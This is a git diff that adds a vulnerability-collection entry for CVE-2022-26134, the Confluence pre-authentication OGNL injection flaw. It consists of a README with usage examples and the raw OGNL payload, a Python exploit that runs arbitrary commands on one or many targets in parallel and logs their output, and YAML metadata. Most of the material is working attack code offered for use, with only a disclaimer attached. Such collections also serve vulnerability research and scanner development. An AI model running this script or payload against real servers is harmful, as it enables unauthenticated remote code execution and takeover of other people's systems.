diff --git a/cve/confluence/2022/CVE-2022-26134/README.md b/cve/confluence/2022/CVE-2022-26134/README.md new file mode 100644 index 0000000000000000000000000000000000000000..81ac4c1d623dece5ad77a5dd7639806015b9e9f0 --- /dev/null +++ b/cve/confluence/2022/CVE-2022-26134/README.md @@ -0,0 +1,54 @@ +# Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134) +Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134) + +- On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. + +### IMPORTANT +This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I didn't recommend of illegal actions and take no responsibility for any malicious use of this script. + + +#### • Request Example +![]()![BurpRequest](https://user-images.githubusercontent.com/6265911/172087965-68f12d26-e3c7-429d-b2c5-639121922f1e.png) + + +### Exploit Usage + +``` +python3 exploit.py -h +Usage: exploit.py [options] + +Options: + -h, --help show this help message and exit + -u URL, --url=URL Base target uri (ex. http://target-uri/) + -f FILEHOSTS, --file=FILEHOSTS + example.txt + -t THREADS_SET, --threads=THREADS_SET + -m TIMEOUT, --maxtimeout=TIMEOUT + -o OUTPUT, --output=OUTPUT + -c COMMAND, --cmd=COMMAND + ``` + + +#### Exploit single target: +`$ python3 exploit.py -u http://xxxxx.com -c id` + +![]()![xpl1](https://user-images.githubusercontent.com/6265911/172089213-ea07c33f-8944-41c5-b6fc-8f3e9250d928.PNG) + + + +#### Exploit multitargets +`$ python3 exploit.py -f urls.txt -p -c id ` + +![]()![xpl2](https://user-images.githubusercontent.com/6265911/172089219-3300095f-2ee8-417a-944f-01d32c8aedef.PNG) + + + +# OGNL expression +```${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}``` + + + +# References: + • [https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html](https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html) + + • [https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis](https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis) diff --git a/cve/confluence/2022/CVE-2022-26134/exploit.py b/cve/confluence/2022/CVE-2022-26134/exploit.py new file mode 100644 index 0000000000000000000000000000000000000000..2ddfc6d7057240c44683681b5e9e392a87143acd --- /dev/null +++ b/cve/confluence/2022/CVE-2022-26134/exploit.py @@ -0,0 +1,114 @@ + +#!/usr/bin/python3 + +# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection +# Google Dork: N/A +# Date: 06/006/2022 +# Exploit Author: h3v0x +# Vendor Homepage: https://www.atlassian.com/ +# Software Link: https://www.atlassian.com/software/confluence/download-archives +# Version: All < 7.4.17 versions before 7.18.1 +# Tested on: - +# CVE : CVE-2022-26134 +# https://github.com/h3v0x/CVE-2022-26134 + +import sys +import requests +import optparse +import multiprocessing + +from requests.packages import urllib3 +from requests.exceptions import MissingSchema, InvalidURL +urllib3.disable_warnings() + +requestEngine = multiprocessing.Manager() +session = requests.Session() + +global paramResults +paramResults = requestEngine.list() +globals().update(locals()) + +def spiderXpl(url): + globals().update(locals()) + if not url.startswith('http'): + url='http://'+url + + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", + "Connection": "close", + "Accept-Encoding": "gzip, deflate"} + + try: + response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False) + if(response.status_code == 302): + print('Found: '+url+' // '+ response.headers['X-Cmd-Response']) + + inputBuffer = str(response.headers['X-Cmd-Response']) + paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n') + else: + pass + + except requests.exceptions.ConnectionError: + print('[x] Failed to Connect: '+url) + pass + except multiprocessing.log_to_stderr: + pass + except KeyboardInterrupt: + print('[!] Stoping exploit...') + exit(0) + except (MissingSchema, InvalidURL): + pass + + +def banner(): + print('[-] CVE-2022-26134') + print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n') + + +def main(): + banner() + + globals().update(locals()) + + sys.setrecursionlimit(100000) + + if not optionsOpt.filehosts: + url = optionsOpt.url + spiderXpl(url) + else: + f = open(optionsOpt.filehosts) + urls = map(str.strip, f.readlines()) + + multiReq = multiprocessing.Pool(optionsOpt.threads_set) + try: + multiReq.map(spiderXpl, urls) + multiReq.close() + multiReq.join() + except UnboundLocalError: + pass + except KeyboardInterrupt: + exit(0) + + + if optionsOpt.output: + print("\n[!] Saving the output result in: %s" % optionsOpt.output) + + with open(optionsOpt.output, "w") as f: + for result in paramResults: + f.write("%s\n" % result) + f.close() + +if __name__ == "__main__": + parser = optparse.OptionParser() + + parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)') + parser.add_option('-f', '--file', dest="filehosts", help='example.txt') + parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10) + parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8) + parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt') + parser.add_option('-c', '--cmd', dest="command", type=str, default='id') + optionsOpt, args = parser.parse_args() + + main() + + + diff --git a/cve/confluence/2022/yaml/CVE-2022-26134.yaml b/cve/confluence/2022/yaml/CVE-2022-26134.yaml new file mode 100644 index 0000000000000000000000000000000000000000..76029829737b632d6d4fddffb976533ec03272ea --- /dev/null +++ b/cve/confluence/2022/yaml/CVE-2022-26134.yaml @@ -0,0 +1,27 @@ +id: CVE-2022-26134 +source: https://github.com/h3v0x/CVE-2022-26134 +info: + name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。 + severity: critical + description: | + Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。 + scope-of-influence: + Confluence Server&Data Center ≥ 1.3.0 + Atlassian Confluence Server and Data Center <7.4.17 + Atlassian Confluence Server and Data Center <7.13.7 + Atlassian Confluence Server and Data Center <7.14.3 + Atlassian Confluence Server and Data Center <7.15.2 + Atlassian Confluence Server and Data Center <7.16.4 + Atlassian Confluence Server and Data Center <7.17.4 + Atlassian Confluence Server and Data Center <7.18.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-26134 + - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-26134 + cwe-id: CWE-74 + cnvd-id: None + kve-id: None + tags: RCE,cve2022 \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index 14afa0d8ea91c15f56c3f689807434b544153e5b..7b2d84edc3633ab6bbd014e93bf05f1864e97b87 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -18,5 +18,6 @@ cve: confluence: - CVE-2019-3396 - CVE-2021-26084 + - CVE-2022-26134 cnvd: kve: \ No newline at end of file